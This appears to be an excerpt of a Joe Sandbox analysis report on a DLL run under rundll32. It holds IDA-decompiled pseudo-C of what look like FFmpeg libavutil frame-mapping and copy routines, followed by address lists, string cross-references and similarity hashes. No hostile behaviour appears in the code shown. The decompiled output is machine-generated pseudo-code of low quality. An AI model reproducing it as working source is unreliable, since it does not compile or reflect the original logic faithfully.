								__eflags =  *((intOrPtr*)(__eax + 0x24)) - __ebp;
								if( *((intOrPtr*)(__eax + 0x24)) != __ebp) {
									goto L66;
								} else {
									goto L89;
								}
							}
						} else {
							L66:
							__ecx =  *(__edx + 4);
							__esp[0xb] = __ecx;
							__ecx = __ecx[0xc];
							__eflags = __ecx;
							if(__ecx == 0) {
								L68:
								__ecx = __edi[0x50];
								__eflags =  *((intOrPtr*)(__edx + 0x24)) - __edi[0x50];
								if( *((intOrPtr*)(__edx + 0x24)) == __edi[0x50]) {
									__esp[0xb] =  *(__esp[0xb]);
									__eax =  *( *(__esp[0xb]) + 0x50);
									__eflags = __eax;
									if(__eax != 0) {
										L79:
										__esp[2] = __edi;
										__ecx = __esp[0xa];
										__esp[1] = __ebx;
										 *__esp = __edx;
										__esp[3] = __esp[0xa];
										__eax =  *__eax();
										__eflags = __eax;
										if(__eax >= 0) {
											goto L76;
										} else {
											__eflags = __eax - 0xffffffd8;
											if(__eax != 0xffffffd8) {
												goto L73;
											} else {
												__eax =  *(__ebx + 0x128);
												L83:
												__eflags = _t213;
												if(_t213 == 0) {
													goto L91;
												} else {
													 *(_t390 + 0x24) =  *(_t289 + 0x50);
													goto L85;
												}
											}
										}
									} else {
										__eax = __esi;
										L85:
										_t215 =  *((intOrPtr*)(_t213 + 4));
										goto L69;
									}
								} else {
									L69:
									__eflags =  *((intOrPtr*)(_t215 + 0x24)) -  *(_t390 + 0x24);
									if( *((intOrPtr*)(_t215 + 0x24)) !=  *(_t390 + 0x24)) {
										L91:
										_t214 = 0xffffffd8;
										goto L76;
									} else {
										_t324 =  *( *((intOrPtr*)( *((intOrPtr*)(_t215 + 4)))) + 0x4c);
										__eflags = _t324;
										if(_t324 == 0) {
											goto L91;
										} else {
											 *(_t390 + 8) = _t343;
											 *((intOrPtr*)(_t390 + 4)) = _t289;
											 *_t390 = _t215;
											 *(_t390 + 0xc) =  *(_t390 + 0x28);
											_t214 =  *_t324();
											__eflags = _t214;
											if(_t214 >= 0) {
												goto L76;
											} else {
												__eflags = _t214 - 0xffffffd8;
												if(_t214 == 0xffffffd8) {
													goto L91;
												} else {
													L73:
													__eflags = _t362;
													if(_t362 == 0) {
														L75:
														 *(_t390 + 0x24) = _t214;
														__eflags = 0;
														 *(_t289 + 0x128) = 0;
														 *_t390 = _t289;
														E1001B300();
														_t214 =  *(_t390 + 0x24);
														 *(_t289 + 0x128) = _t362;
														 *(_t289 + 0x50) = _t383;
														goto L76;
													} else {
														__eflags =  *(_t289 + 0x128) - _t362;
														if( *(_t289 + 0x128) != _t362) {
															 *((intOrPtr*)(_t390 + 0x14)) = 0x358;
															__eflags = 0;
															 *((intOrPtr*)(_t390 + 4)) = 0;
															 *_t390 = 0;
															 *(_t390 + 0x10) = "libavutil/hwcontext.c";
															 *(_t390 + 0xc) = "orig_dst_frames == ((void *)0) || orig_dst_frames == dst->hw_frames_ctx";
															 *(_t390 + 8) = "Assertion %s failed at %s:%d\n";
															E10026560();
															abort();
															_push(_t362);
															_push(_t289);
															_t392 = _t390 - 0x34;
															_t219 = _t392[0x10];
															_t291 = _t392[0x11];
															_t364 =  *(_t219 + 4);
															_t326 =  *((intOrPtr*)(_t364 + 4));
															_t306 =  *(_t326 + 0xc);
															__eflags =  *(_t326 + 0xc);
															if( *(_t326 + 0xc) == 0) {
																_t327 =  *_t326;
																_t307 =  *(_t327 + 0x3c);
																__eflags =  *(_t327 + 0x3c);
																if( *(_t327 + 0x3c) == 0) {
																	_t220 = 0xffffffd8;
																	goto L103;
																} else {
																	__eflags =  *(_t364 + 0x1c);
																	if( *(_t364 + 0x1c) == 0) {
																		_t220 = 0xffffffea;
																		goto L103;
																	} else {
																		 *_t392 = _t219;
																		_t221 = L10009FC0(_t291, _t307);
																		 *(_t291 + 0x128) = _t221;
																		__eflags = _t221;
																		if(_t221 == 0) {
																			goto L102;
																		} else {
																			_t392[1] = _t291;
																			 *_t392 = _t364;
																			_t224 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t364 + 4)))) + 0x3c))();
																			__eflags = _t224;
																			if(_t224 < 0) {
																				_t392[7] = _t224;
																				 *_t392 = _t291 + 0x128;
																				E1000A000(_t291 + 0x128, _t364);
																				_t220 = _t392[7];
																				goto L103;
																			} else {
																				 *(_t291 + 0x40) = _t291;
																				__eflags = 0;
																				return 0;
																			}
																		}
																	}
																}
															} else {
																 *((intOrPtr*)(_t291 + 0x50)) =  *((intOrPtr*)(_t364 + 0x24));
																 *_t392 = _t219;
																_t227 = L10009FC0(_t291, _t306);
																 *(_t291 + 0x128) = _t227;
																__eflags = _t227;
																if(_t227 == 0) {
																	L102:
																	_t220 = 0xfffffff4;
																	goto L103;
																} else {
																	_t228 = L1001AC40(_t291, _t343, _t364);
																	_t392[0xb] = _t228;
																	__eflags = _t228;
																	if(_t228 == 0) {
																		goto L102;
																	} else {
																		_t392[1] = _t228;
																		_t392[2] = 0;
																		_t230 =  *( *((intOrPtr*)(_t364 + 4)) + 0xc);
																		 *_t392 = _t230;
																		L96();
																		__eflags = _t230;
																		if(_t230 < 0) {
																			L109:
																			_t392[7] = _t230;
																			 *_t392 =  &(_t392[0xb]);
																			L1001ADB0(_t291);
																			return _t392[7];
																		} else {
																			 *_t392 = _t291;
																			_t392[2] =  *( *((intOrPtr*)(_t364 + 4)) + 0x10);
																			_t392[1] = _t392[0xb];
																			_t230 = E1001E450(_t291, _t343, _t364);
																			__eflags = _t230;
																			if(_t230 == 0) {
																				goto L109;
																			} else {
																				_t392[3] = _t230;
																				_t392[7] = _t230;
																				_t392[1] = 0x10;
																				_t392[2] = "Failed to map frame into derived frame context: %d.\n";
																				 *_t392 = _t364;
																				E10026560();
																				 *_t392 =  &(_t392[0xb]);
																				L1001ADB0("Failed to map frame into derived frame context: %d.\n");
																				_t220 = _t392[7];
																				L103:
																				return _t220;
																			}
																		}
																	}
																}
															}
														} else {
															goto L75;
														}
													}
												}
											}
										}
									}
								}
							} else {
								__eflags = __ecx[4] - __eax;
								if(__ecx[4] == __eax) {
									L89:
									__eax = __edi[0xb8];
									__eflags = __eax;
									if(__eax == 0) {
										 *__esp = __edx;
										__ecx = "Invalid mapping found when attempting unmap.\n";
										__ebx = 0x10;
										__esp[2] = "Invalid mapping found when attempting unmap.\n";
										__esp[1] = 0x10;
										E10026560() = 0xffffffea;
										L76:
										return _t214;
									} else {
										__esi =  *(__eax + 4);
										__eax = E1001B300(__ebx);
										__edi = __esp[0x11];
										__ebp = __esp[0x12];
										__eax =  *__esi;
										__esp[0x14] = __ebx;
										__esi = __esp[0x10];
										__ebx = __esp[0xf];
										__esp[0x15] = __eax;
										__esp =  &(__esp[0x13]);
										_push(_t383);
										_push(_t343);
										_push(_t362);
										_t396 = _t390 - 0x1c;
										_t297 = _t396[0xd];
										_t385 = _t396[0xc];
										_t345 = _t297 + 0x148;
										 *((intOrPtr*)(_t385 + 0x50)) =  *((intOrPtr*)(_t297 + 0x50));
										 *((intOrPtr*)(_t385 + 0x44)) =  *((intOrPtr*)(_t297 + 0x44));
										 *((intOrPtr*)(_t385 + 0x48)) =  *((intOrPtr*)(_t297 + 0x48));
										 *((intOrPtr*)(_t385 + 0x4c)) =  *((intOrPtr*)(_t297 + 0x4c));
										 *(_t385 + 0x120) =  *(_t297 + 0x120);
										 *(_t385 + 0xb4) =  *(_t297 + 0xb4);
										 *(_t385 + 0xb0) =  *(_t297 + 0xb0);
										 *_t396 = _t345;
										if(L1000EC10(_t289) == 0) {
											_t283 =  *(_t297 + 0xb4);
											_t341 =  *(_t297 + 0xb0);
											if((_t283 | _t341) != 0) {
												_t396[2] = _t283;
												_t396[1] = _t341;
												 *_t396 = _t385 + 0x148;
												E1000D1B0();
											} else {
												 *(_t385 + 0x14c) =  *(_t297 + 0x120);
												 *(_t385 + 0x148) = 0;
											}
										}
										_t308 = 0;
										_t247 = E1001A6C0(_t385, 0, _t297, 0);
										_t368 = _t247;
										if(_t247 < 0) {
											L20:
											E1001A460(_t385);
											return _t368;
										} else {
											 *_t396 = _t345;
											if(L1000EC10() != 0) {
												_t396[1] = _t345;
												 *_t396 = _t385 + 0x148;
												_t253 = E1000D340();
												__eflags = _t253;
												_t368 = _t253;
												if(_t253 < 0) {
													goto L20;
												} else {
													_t254 =  *(_t297 + 0xb8);
													__eflags = _t254;
													if(_t254 != 0) {
														goto L7;
													} else {
														goto L33;
													}
												}
											} else {
												_t254 =  *(_t297 + 0xb8);
												if(_t254 == 0) {
													L33:
													 *_t396 = _t385;
													_t396[1] = 0;
													_t281 = L1001ADF0();
													__eflags = _t281;
													_t368 = _t281;
													if(_t281 < 0) {
														goto L20;
													} else {
														_t396[1] = _t297;
														 *_t396 = _t385;
														_t282 = L1001B8D0();
														__eflags = _t282;
														_t368 = _t282;
														if(_t282 < 0) {
															goto L20;
														} else {
															goto L35;
														}
													}
												} else {
													L7:
													_t370 = 0;
													L9:
													while(1) {
														if(_t254 == 0) {
															L11:
															_t370 = _t370 + 1;
															if(_t370 != 8) {
																_t254 =  *(_t297 + 0xb8 + _t370 * 4);
																continue;
															} else {
																if( *((intOrPtr*)(_t297 + 0xd8)) == 0) {
																	L22:
																	_t255 =  *(_t297 + 0x128);
																	__eflags = _t255;
																	if(_t255 == 0) {
																		L24:
																		__eflags =  *(_t297 + 0x40) - _t297;
																		if( *(_t297 + 0x40) == _t297) {
																			 *(_t385 + 0x40) = _t385;
																			goto L38;
																		} else {
																			_t352 =  *(_t385 + 0x14c);
																			_t368 = 0xffffffea;
																			__eflags = _t352;
																			if(_t352 == 0) {
																				goto L20;
																			} else {
																				_t396[1] = _t352;
																				 *_t396 = 4;
																				_t267 = L10028EC0();
																				 *(_t385 + 0x40) = _t267;
																				__eflags = _t267;
																				if(_t267 == 0) {
																					goto L19;
																				} else {
																					_t314 = _t352 * 4;
																					_t378 =  *(_t297 + 0x40);
																					_t353 = _t267;
																					__eflags = _t314 - 8;
																					if(_t314 >= 8) {
																						__eflags = _t267 & 0x00000001;
																						if((_t267 & 0x00000001) != 0) {
																							_t268 =  *_t378 & 0x000000ff;
																							_t353 = _t353 + 1;
																							_t378 = _t378 + 1;
																							_t314 = _t314 - 1;
																							 *(_t353 - 1) = _t268;
																						}
																						__eflags = _t353 & 0x00000002;
																						if((_t353 & 0x00000002) != 0) {
																							_t269 =  *_t378 & 0x0000ffff;
																							_t353 = _t353 + 2;
																							_t378 = _t378 + 2;
																							_t314 = _t314 - 2;
																							 *(_t353 - 2) = _t269;
																						}
																						__eflags = _t353 & 0x00000004;
																						if((_t353 & 0x00000004) == 0) {
																							goto L28;
																						} else {
																							_t356 = _t353 + 4;
																							 *(_t356 - 4) =  *_t378;
																							memcpy(_t356, _t378 + 4, _t314 - 4);
																							_t396 =  &(_t396[3]);
																							goto L38;
																						}
																						L50:
																						_t338 = _t337 + _t262;
																						_t375 = _t374 + _t262;
																						_t263 = 0;
																						__eflags = _t349 & 0x00000002;
																						if((_t349 & 0x00000002) != 0) {
																							 *_t338 =  *_t375 & 0x0000ffff;
																							_t263 = 2;
																						}
																						__eflags = _t349 & 0x00000001;
																						if((_t349 & 0x00000001) == 0) {
																							L35:
																							_t376 = 0;
																							__eflags = 0;
																						} else {
																							_t376 = 0;
																							 *((char*)(_t338 + _t263)) =  *(_t375 + _t263) & 0x000000ff;
																						}
																						return _t376;
																						goto L113;
																					} else {
																						L28:
																						memcpy(_t353, _t378, _t314);
																						_t396 =  &(_t396[3]);
																					}
																					L38:
																					__eflags = _t385 & 0x00000001;
																					_t335 = _t385;
																					_t309 = _t297;
																					_t347 = 0x20;
																					if((_t385 & 0x00000001) != 0) {
																						_t335 = _t385 + 1;
																						_t347 = 0x1f;
																						_t309 = _t297 + 1;
																						 *_t385 =  *_t297 & 0x000000ff;
																					}
																					__eflags = _t335 & 0x00000002;
																					if((_t335 & 0x00000002) != 0) {
																						_t257 =  *_t309 & 0x0000ffff;
																						_t335 = _t335 + 2;
																						_t309 =  &(_t309[1]);
																						_t347 = _t347 - 2;
																						 *(_t335 - 2) = _t257;
																					}
																					_t396[0xd] = _t297;
																					_t258 = 0;
																					_t373 = _t347 & 0xfffffffc;
																					__eflags = _t373;
																					do {
																						 *(_t335 + _t258) =  *(_t309 + _t258);
																						_t258 = _t258 + 4;
																						__eflags = _t258 - _t373;
																					} while (_t258 < _t373);
																					_t336 = _t335 + _t258;
																					_t310 = _t309 + _t258;
																					_t300 = _t396[0xd];
																					_t259 = 0;
																					__eflags = _t347 & 0x00000002;
																					if((_t347 & 0x00000002) != 0) {
																						 *_t336 =  *_t310 & 0x0000ffff;
																						_t259 = 2;
																					}
																					__eflags = _t347 & 0x00000001;
																					if((_t347 & 0x00000001) != 0) {
																						 *((char*)(_t336 + _t259)) =  *(_t310 + _t259) & 0x000000ff;
																					}
																					__eflags = _t385 & 0x00000001;
																					_t349 = 0x20;
																					_t337 = _t385 + 0x20;
																					_t374 = _t300 + 0x20;
																					if((_t385 & 0x00000001) != 0) {
																						_t337 = _t385 + 0x21;
																						_t349 = 0x1f;
																						_t374 = _t300 + 0x21;
																						 *(_t385 + 0x20) =  *(_t300 + 0x20) & 0x000000ff;
																					}
																					__eflags = _t337 & 0x00000002;
																					if((_t337 & 0x00000002) != 0) {
																						_t261 =  *_t374 & 0x0000ffff;
																						_t337 = _t337 + 2;
																						_t374 =  &(_t374[1]);
																						_t349 = _t349 - 2;
																						 *(_t337 - 2) = _t261;
																					}
																					_t262 = 0;
																					_t302 = _t349 & 0xfffffffc;
																					__eflags = _t302;
																					do {
																						 *(_t337 + _t262) =  *(_t374 + _t262);
																						_t262 = _t262 + 4;
																						__eflags = _t262 - _t302;
																					} while (_t262 < _t302);
																					goto L50;
																				}
																			}
																		}
																	} else {
																		 *_t396 = _t255;
																		_t273 = L10009FC0(_t297, _t308);
																		 *(_t385 + 0x128) = _t273;
																		__eflags = _t273;
																		if(_t273 == 0) {
																			goto L19;
																		} else {
																			goto L24;
																		}
																	}
																} else {
																	_t308 = 4;
																	_t396[1] = 4;
																	 *_t396 =  *(_t297 + 0xdc);
																	_t275 = E100291F0();
																	 *((intOrPtr*)(_t385 + 0xd8)) = _t275;
																	if(_t275 == 0) {
																		goto L19;
																	} else {
																		_t339 =  *(_t297 + 0xdc);
																		 *(_t385 + 0xdc) = _t339;
																		if(_t339 <= 0) {
																			goto L22;
																		} else {
																			_t396[0xc] = _t385;
																			_t388 = _t297;
																			_t304 = 0;
																			while(1) {
																				_t381 = _t304 * 4;
																				 *_t396 =  *( *((intOrPtr*)(_t388 + 0xd8)) + _t381);
																				 *((intOrPtr*)(_t275 + _t381)) = L10009FC0(_t304, _t308);
																				_t275 =  *((intOrPtr*)(_t396[0xc] + 0xd8));
																				if( *((intOrPtr*)(_t275 + _t381)) == 0) {
																					break;
																				}
																				_t304 = _t304 + 1;
																				__eflags =  *((intOrPtr*)(_t388 + 0xdc)) - _t304;
																				if( *((intOrPtr*)(_t388 + 0xdc)) <= _t304) {
																					_t297 = _t388;
																					_t385 = _t396[0xc];
																					goto L22;
																				} else {
																					continue;
																				}
																				goto L113;
																			}
																			_t385 = _t396[0xc];
																			goto L19;
																		}
																	}
																}
															}
														} else {
															 *_t396 = _t254;
															_t280 = L10009FC0(_t297, _t308);
															 *((intOrPtr*)(_t385 + 0xb8 + _t370 * 4)) = _t280;
															if(_t280 == 0) {
																L19:
																_t368 = 0xfffffff4;
																goto L20;
															} else {
																goto L11;
															}
														}
														goto L113;
													}
												}
											}
										}
									}
								} else {
									goto L68;
								}
							}
						}
					}
				}
				L113:
			}

0x1001e450
0x1001e453
0x1001e45b
0x1001e45f
0x1001e463
0x1001e467
0x1001e46b
0x1001e46f
0x1001e479
0x1001e47c
0x1001e484
0x1001e488
0x1001e5a0
0x00000000
0x1001e48e
0x1001e48e
0x1001e490
0x1001e493
0x1001e550
0x1001e553
0x1001e556
0x00000000
0x1001e55c
0x1001e55f
0x1001e561
0x1001e564
0x1001e566
0x00000000
0x00000000
0x00000000
0x00000000
0x1001e566
0x1001e499
0x1001e499
0x1001e49c
0x1001e49e
0x1001e5b8
0x1001e5bb
0x1001e5be
0x00000000
0x1001e5c4
0x1001e5c4
0x1001e5c7
0x00000000
0x00000000
0x00000000
0x00000000
0x1001e5c7
0x1001e4a4
0x1001e4a4
0x1001e4a4
0x1001e4a7
0x1001e4ab
0x1001e4ae
0x1001e4b0
0x1001e4bb
0x1001e4bb
0x1001e4be
0x1001e4c1
0x1001e61e
0x1001e620
0x1001e623
0x1001e625
0x1001e56c
0x1001e56c
0x1001e570
0x1001e574
0x1001e578
0x1001e57b
0x1001e57f
0x1001e581
0x1001e583
0x00000000
0x1001e585
0x1001e585
0x1001e588
0x00000000
0x1001e58e
0x1001e58e
0x1001e5a2
0x1001e5a2
0x1001e5a4
0x00000000
0x1001e5a6
0x1001e5a9
0x00000000
0x1001e5a9
0x1001e5a4
0x1001e588
0x1001e62b
0x1001e62b
0x1001e5ad
0x1001e5ad
0x00000000
0x1001e5ad
0x1001e4c7
0x1001e4c7
0x1001e4cb
0x1001e4ce
0x1001e610
0x1001e610
0x00000000
0x1001e4d4
0x1001e4d9
0x1001e4dc
0x1001e4de
0x00000000
0x1001e4e4
0x1001e4e4
0x1001e4ec
0x1001e4f0
0x1001e4f3
0x1001e4f7
0x1001e4f9
0x1001e4fb
0x00000000
0x1001e4fd
0x1001e4fd
0x1001e500
0x00000000
0x1001e506
0x1001e506
0x1001e506
0x1001e508
0x1001e516
0x1001e516
0x1001e51a
0x1001e51c
0x1001e522
0x1001e525
0x1001e52a
0x1001e52e
0x1001e534
0x00000000
0x1001e50a
0x1001e50a
0x1001e510
0x1001e656
0x1001e65e
0x1001e660
0x1001e664
0x1001e667
0x1001e66f
0x1001e677
0x1001e67f
0x1001e684
0x1001e690
0x1001e691
0x1001e692
0x1001e695
0x1001e699
0x1001e69d
0x1001e6a0
0x1001e6a3
0x1001e6a6
0x1001e6a8
0x1001e760
0x1001e762
0x1001e765
0x1001e767
0x1001e7e5
0x00000000
0x1001e769
0x1001e76c
0x1001e76e
0x1001e7db
0x00000000
0x1001e770
0x1001e770
0x1001e773
0x1001e778
0x1001e77e
0x1001e780
0x00000000
0x1001e782
0x1001e787
0x1001e78b
0x1001e78e
0x1001e791
0x1001e793
0x1001e7c0
0x1001e7ca
0x1001e7cd
0x1001e7d2
0x00000000
0x1001e795
0x1001e795
0x1001e79b
0x1001e79f
0x1001e79f
0x1001e793
0x1001e780
0x1001e76e
0x1001e6ae
0x1001e6b1
0x1001e6b4
0x1001e6b7
0x1001e6bc
0x1001e6c2
0x1001e6c4
0x1001e750
0x1001e750
0x00000000
0x1001e6ca
0x1001e6ca
0x1001e6cf
0x1001e6d3
0x1001e6d5
0x00000000
0x1001e6d7
0x1001e6d7
0x1001e6dd
0x1001e6e4
0x1001e6e7
0x1001e6ea
0x1001e6ef
0x1001e6f1
0x1001e7a0
0x1001e7a0
0x1001e7a8
0x1001e7ab
0x1001e7b9
0x1001e6f7
0x1001e6fd
0x1001e700
0x1001e708
0x1001e70c
0x1001e711
0x1001e713
0x00000000
0x1001e719
0x1001e719
0x1001e722
0x1001e72b
0x1001e72f
0x1001e733
0x1001e736
0x1001e73f
0x1001e742
0x1001e747
0x1001e755
0x1001e75a
0x1001e75a
0x1001e713
0x1001e6f1
0x1001e6d5
0x1001e6c4
0x00000000
0x00000000
0x00000000
0x1001e510
0x1001e508
0x1001e500
0x1001e4fb
0x1001e4de
0x1001e4ce
0x1001e4b2
0x1001e4b2
0x1001e4b5
0x1001e5d0
0x1001e5d0
0x1001e5d6
0x1001e5d8
0x1001e632
0x1001e635
0x1001e63a
0x1001e63f
0x1001e643
0x1001e64c
0x1001e537
0x1001e54a
0x1001e5da
0x1001e5da
0x1001e5e0
0x1001e5e5
0x1001e5e9
0x1001e5ed
0x1001e5ef
0x1001e5f3
0x1001e5f7
0x1001e5fb
0x1001e5ff
0x1001bc40
0x1001bc41
0x1001bc42
0x1001bc44
0x1001bc47
0x1001bc4b
0x1001bc52
0x1001bc5e
0x1001bc64
0x1001bc6a
0x1001bc70
0x1001bc79
0x1001bc85
0x1001bc8b
0x1001bc91
0x1001bc9b
0x1001bc9d
0x1001bca3
0x1001bcad
0x1001be70
0x1001be7a
0x1001be7e
0x1001be81
0x1001bcb3
0x1001bcb9
0x1001bcc1
0x1001bcc1
0x1001bcad
0x1001bcc7
0x1001bccd
0x1001bcd4
0x1001bcd6
0x1001bdb8
0x1001bdba
0x1001bdc8
0x1001bcdc
0x1001bcdc
0x1001bce6
0x1001be40
0x1001be4a
0x1001be4d
0x1001be52
0x1001be54
0x1001be56
0x00000000
0x1001be5c
0x1001be5c
0x1001be62
0x1001be64
0x00000000
0x1001be6a
0x00000000
0x1001be6a
0x1001be64
0x1001bcec
0x1001bcec
0x1001bcf4
0x1001be90
0x1001be90
0x1001be95
0x1001be99
0x1001be9e
0x1001bea0
0x1001bea2
0x00000000
0x1001bea8
0x1001bea8
0x1001beac
0x1001beaf
0x1001beb4
0x1001beb6
0x1001beb8
0x00000000
0x00000000
0x00000000
0x00000000
0x1001beb8
0x1001bcfa
0x1001bcfa
0x1001bcfa
0x00000000
0x1001bd07
0x1001bd09
0x1001bd22
0x1001bd22
0x1001bd26
0x1001bd00
0x00000000
0x1001bd28
0x1001bd30
0x1001bdd6
0x1001bdd6
0x1001bddc
0x1001bdde
0x1001bdf2
0x1001bdf2
0x1001bdf5
0x1001bed0
0x00000000
0x1001bdfb
0x1001bdfb
0x1001be01
0x1001be06
0x1001be08
0x00000000
0x1001be0a
0x1001be0a
0x1001be0e
0x1001be15
0x1001be1a
0x1001be1d
0x1001be1f
0x00000000
0x1001be21
0x1001be21
0x1001be28
0x1001be2b
0x1001be2d
0x1001be30
0x1001bf96
0x1001bf98
0x1001c033
0x1001c036
0x1001c037
0x1001c038
0x1001c039
0x1001c039
0x1001bf9e
0x1001bfa4
0x1001c01e
0x1001c021
0x1001c024
0x1001c027
0x1001c02a
0x1001c02a
0x1001bfa6
0x1001bfac
0x00000000
0x1001bfb2
0x1001bfb4
0x1001bfbd
0x1001bfc0
0x1001bfc0
0x00000000
0x1001bfc0
0x1001bf66
0x1001bf66
0x1001bf68
0x1001bf6a
0x1001bf6c
0x1001bf72
0x1001bf77
0x1001bf7a
0x1001bf7a
0x1001bf7f
0x1001bf82
0x1001bebe
0x1001bebe
0x1001bebe
0x1001bf88
0x1001bf8c
0x1001bf8e
0x1001bf8e
0x1001bec9
0x00000000
0x1001be36
0x1001be36
0x1001be36
0x1001be36
0x1001be36
0x1001bed3
0x1001bed3
0x1001bed9
0x1001bedb
0x1001bedd
0x1001bee2
0x1001bfdf
0x1001bfe2
0x1001bfe7
0x1001bfea
0x1001bfea
0x1001bee8
0x1001beeb
0x1001bfc7
0x1001bfca
0x1001bfcd
0x1001bfd0
0x1001bfd3
0x1001bfd3
0x1001bef1
0x1001bef7
0x1001bef9
0x1001bef9
0x1001befc
0x1001beff
0x1001bf02
0x1001bf05
0x1001bf05
0x1001bf09
0x1001bf0b
0x1001bf0d
0x1001bf11
0x1001bf13
0x1001bf19
0x1001bf1e
0x1001bf21
0x1001bf21
0x1001bf26
0x1001bf29
0x1001bf2f
0x1001bf2f
0x1001bf32
0x1001bf38
0x1001bf3d
0x1001bf40
0x1001bf43
0x1001c00b
0x1001c00e
0x1001c013
0x1001c016
0x1001c016
0x1001bf49
0x1001bf4c
0x1001bff2
0x1001bff5
0x1001bff8
0x1001bffb
0x1001bffe
0x1001bffe
0x1001bf54
0x1001bf56
0x1001bf56
0x1001bf59
0x1001bf5c
0x1001bf5f
0x1001bf62
0x1001bf62
0x00000000
0x1001bf59
0x1001be1f
0x1001be08
0x1001bde0
0x1001bde0
0x1001bde3
0x1001bde8
0x1001bdee
0x1001bdf0
0x00000000
0x00000000
0x00000000
0x00000000
0x1001bdf0
0x1001bd36
0x1001bd36
0x1001bd3b
0x1001bd45
0x1001bd48
0x1001bd4d
0x1001bd55
0x00000000
0x1001bd57
0x1001bd57
0x1001bd5d
0x1001bd65
0x00000000
0x1001bd67
0x1001bd67
0x1001bd6d
0x1001bd6f
0x1001bd81
0x1001bd81
0x1001bd94
0x1001bd9c
0x1001bda2
0x1001bdad
0x00000000
0x00000000
0x1001bd78
0x1001bd79
0x1001bd7f
0x1001bdd0
0x1001bdd2
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1001bd7f
0x1001bdaf
0x00000000
0x1001bdaf
0x1001bd65
0x1001bd55
0x1001bd30
0x1001bd0b
0x1001bd0b
0x1001bd0e
0x1001bd13
0x1001bd1c
0x1001bdb3
0x1001bdb3
0x00000000
0x00000000
0x00000000
0x00000000
0x1001bd1c
0x00000000
0x1001bd09
0x1001bd07
0x1001bcf4
0x1001bce6
0x1001bcd6
0x00000000
0x00000000
0x00000000
0x1001e4b5
0x1001e4b0
0x1001e49e
0x1001e493
0x00000000

APIs

mv_frame_unref.F072 ref: 1001E525
mv_frame_unref.F072 ref: 1001E5E0

Strings

Failed to map frame into derived frame context: %d., xrefs: 1001E71D
Invalid mapping found when attempting unmap., xrefs: 1001E635

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_frame_unref
String ID: Failed to map frame into derived frame context: %d.$Invalid mapping found when attempting unmap.
API String ID: 3522828444-968520014
Opcode ID: a8cee79f1116f489e9366e10ea9b5597fa9099dcfd39c1eecab353edc7ebc651
Instruction ID: 1d7c3b7aca9d3417cd3ea7e1bcd086570995cae0267e84f3f0b04429ecccd582
Opcode Fuzzy Hash: a8cee79f1116f489e9366e10ea9b5597fa9099dcfd39c1eecab353edc7ebc651
Instruction Fuzzy Hash: F991A0B4A09B418FC744DF29C58051EBBE1FF88794F55896DE8998B351E730ED81CB82

Uniqueness

Uniqueness Score: -1.00%

Function 10010320 Relevance: 22.7, APIs: 15, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E10010320(intOrPtr* _a4) {
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t97;
				signed int _t100;
				signed int _t106;
				signed int _t112;
				signed int _t118;
				signed int _t124;
				signed int _t130;
				signed int _t136;
				signed int _t139;
				signed int _t147;
				intOrPtr _t148;
				intOrPtr _t149;
				intOrPtr _t150;
				intOrPtr _t151;
				intOrPtr _t152;
				intOrPtr _t153;
				signed int _t154;
				signed int _t158;
				signed int _t172;
				signed int _t174;
				signed int _t176;
				signed int _t178;
				signed int _t180;
				signed int _t182;
				signed int _t184;
				signed int _t186;
				signed int _t187;
				intOrPtr* _t188;
				intOrPtr* _t189;
				signed int _t199;
				void* _t200;
				intOrPtr* _t201;

				_t188 = 0x100b3200;
				_t201 = _t200 - 0x2c;
				_v40 = 0;
				_t189 = _a4;
				while(1) {
					_v40 = _v40 + 1;
					_t188 = _t188 + 0x40;
					if(_v40 == 0x17) {
						break;
					}
					_t6 = _t188 + 0x10; // 0x1000ffb0
					if( *_t6 == 0) {
						continue;
					} else {
						_t9 = _t188 + 0x10; // 0x1000ffb0
						_t10 = _t188 + 0x14; // 0x10010008
						_t172 =  *_t10;
						 *_t201 =  *((intOrPtr*)(_t189 + 0x10));
						_v56 =  *((intOrPtr*)(_t189 + 0x14));
						_v52 =  *_t9;
						_v48 = _t172;
						_t97 = L10035A10( *((intOrPtr*)(_t189 + 0x14)), _t188, _t189);
						_t147 = _t172;
						_t14 = _t188 + 0x1c; // 0x1000fde8
						_t192 =  <  ? _t97 :  ~_t97;
						_t15 = _t188 + 0x18; // 0x10010060
						_v48 =  *_t14;
						_v52 =  *_t15;
						_t174 =  *((intOrPtr*)(_t189 + 0x1c));
						 *_t201 =  *((intOrPtr*)(_t189 + 0x18));
						_v56 = _t174;
						_t100 = L10035A10(_t147, _t188, _t189);
						 *_t201 =  <  ? _t97 :  ~_t97;
						_v56 = _t147;
						_v48 = _t174;
						_t102 =  <  ? _t100 :  ~_t100;
						_v52 =  <  ? _t100 :  ~_t100;
						_t148 = L10035990(_t147, _t189);
						_t24 = _t188 + 0x20; // 0x1000fe50
						_t25 = _t188 + 0x24; // 0x0
						_v52 =  *_t24;
						_v48 =  *_t25;
						_t176 =  *((intOrPtr*)(_t189 + 0x24));
						 *_t201 =  *((intOrPtr*)(_t189 + 0x20));
						_v56 = _t176;
						_t106 = L10035A10(_t148, _t188, _t189);
						 *_t201 = _t148;
						_v56 = _t174;
						_v48 = _t176;
						_t108 =  <  ? _t106 :  ~_t106;
						_v52 =  <  ? _t106 :  ~_t106;
						_t149 = L10035990(_t148, _t189);
						_t34 = _t188 + 0x28; // 0x0
